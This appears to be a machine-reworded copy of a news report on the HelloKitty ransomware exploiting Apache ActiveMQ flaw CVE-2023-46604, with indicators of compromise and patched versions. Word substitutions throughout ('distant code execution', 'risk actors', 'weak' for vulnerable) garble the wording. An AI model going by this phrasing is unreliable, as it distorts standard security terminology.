The HelloKitty ransomware operation is exploiting a lately disclosed Apache ActiveMQ distant code execution (RCE) flaw to breach networks and encrypt units.
The flaw, tracked CVE-2023-46604, is a essential severity (CVSS v3 rating: 10.0) RCE permitting attackers to execute arbitrary shell instructions by exploiting the serialized class sorts within the OpenWire protocol.
The security downside was addressed in a security replace on October 25, 2023. Nevertheless, risk monitoring service ShadowServer reported that, as of October 30, there have been nonetheless 3,329 internet-exposed servers utilizing a model weak to exploitation.
Yesterday, Rapid7 reported that they’d seen at the least two distinct circumstances of risk actors exploiting CVE-2023-46604 in buyer environments to deploy HelloKitty ransomware binaries and extort the focused organizations.
HelloKitty is a ransomware operation that launched in November 2020 and lately had its supply code leaked on a Russian-speaking cybercrime boards making it accessible to anybody.
The assaults noticed by Rapid7 began on October 27, two days after Apache launched the security bulletin and fixes, so this seems to be a case of n-day exploitation.
Rapid7 analyzed two MSI information disguised as PNG photographs, fetched from a suspicious area, and located that they comprise a .NET executable that hundreds a base64-encoded .NET DLL named EncDLL.
EncDLL is liable for looking for and stopping particular processes, encrypting information with the RSACryptoServiceProvider operate, and appending a “.locked” extension to them.
Some artifacts left behind by these assaults embrace:
- Java.exe working with an Apache software because the mother or father course of, which is atypical.
- Loading of distant binaries named M2.png and M4.png through MSIExec, indicative of malicious exercise.
- Repeated, failed makes an attempt to encrypt information, signaling clumsy exploitation efforts.
- Log entries in activemq.log displaying warnings about transport connections failing because of an aborted connection, which might counsel exploitation.
- Presence of information or community communications related to the HelloKitty ransomware, identifiable by particular domains and file hashes.
The Rapid7 report incorporates details about the newest HelloKitty indicators of compromise, however extra complete knowledge on that entrance will be discovered on this FBI report centered on the ransomware household.
The newest ShadowServer stats present that there are nonetheless 1000’s of weak ActiveMQ cases on the market, so directors are urged to use the accessible security updates as quickly as doable.
Susceptible variations vary between 5.15 and 5.18, together with Legacy OpenWire Module variations, are fastened in variations are 5.15.16, 5.16.7, 5.17.6, and 5.18.3.
